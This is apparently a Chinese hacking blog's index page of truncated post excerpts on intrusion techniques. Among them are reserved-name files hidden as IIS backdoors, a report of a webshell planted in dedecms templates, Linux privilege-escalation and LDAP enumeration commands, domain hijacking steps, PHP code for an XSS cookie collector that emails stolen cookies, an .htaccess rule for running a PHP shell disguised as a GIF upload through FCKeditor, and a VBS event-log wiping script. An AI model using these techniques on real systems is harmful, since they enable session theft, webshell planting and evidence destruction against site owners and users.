(老文章)Windows 无法删除的文件/文件夹 建立与删除方法

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn” “con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,然而IIS可以中这种几文件是可以解析成功,所以又是一种后门思路,但和建立dir...目录不同的是,如果文件有毒,会被杀!   使用copy命令即可实现:  D:wwwroot>copy rootkit.as...

- 阅读全文 -

dedecms官方模板包含一句话木马

现在的黑客多胆大包天啊,在天朝居然敢干这种明目张胆的事情。 应该是前几天出的那个dedecms的0day.官方的网站被日,然后被在风格模板里面值入 了一句话木马。XXOO。这年头啥多靠不住。”官方”也一样!你懂得的? 另外一个目录也有。 有在织梦官方下过模板的同学快看看吧。

- 阅读全文 -

各种渗透,提权的经验和技巧总结(中)

liunx 相关提权渗透技巧总结,一、ldap 渗透技巧: 1.cat /etc/nsswitch 看看密码登录策略我们可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net 找到ou,dc,dc设置 3.查找管理员信息 匿名方式 ldapsearch -x -D "cn=administrator...

- 阅读全文 -

入侵渗透的一些思路

渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的。 一,踩点 踩点可以了解目标主机和网络的一些基本的安全信息,主要有; 1,管理员联系信息,电话号,传真号; 2,IP地址范围; 3,DNS服务器; 4,邮件服务器。 相关搜索方法: 1,搜索网页。 确定目标信息1,为以后发动字典和木马入侵做准备;寻找网页源代码找注释和隐藏域,寻找隐藏域中的”FORM”标记。例如: 可以发起SQL注入攻击,为...

- 阅读全文 -

域名劫持攻击的几大步骤

1、 获得要劫持的域名注册信息  攻击者会先访问网络解决方案公司www.networksolutions.com,通过该公司主页面所提供MAKE CHANGES功能,输入要查询的域名,获得该域名注册信息以abc。com为例,我们将获得以下信息:  Registrant:  Capital Cities/ABC,Inc (ABC10-DOM)  77 W 66th St。  New York, NY...

- 阅读全文 -

XSS获取远程路径并发送到邮件

不解释!   <?php $ip = $_SERVER['REMOTE_ADDR']; ; $referer = $_SERVER['HTTP_REFERER']; $cookie = $_GET['c']; $agent = $_SERVER['HTTP_USER_AGENT']; $subject='远程XSS获取地址-域名:'.$referer; $body="<p&g...

- 阅读全文 -

FCKeditor上传Getshell不要忘记htaccess

有些服务器开启了.htaccess文件上传,那么经常碰到fckeditor的就可以利用该文件上传一个phpshell。 1.创建一个.htaccess文件,内容如下:   <FilesMatch "_php.gif"> SetHandler application/x-httpd-php </FilesMatch>     2.上传shell ...

- 阅读全文 -

日志的伪造

删除日志VBS: cleanevent.vbs strComputer = "主机名字By foolishqiang" Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate,(Backup)}!\\" & _ strComputer & "\root\cimv2") di...

- 阅读全文 -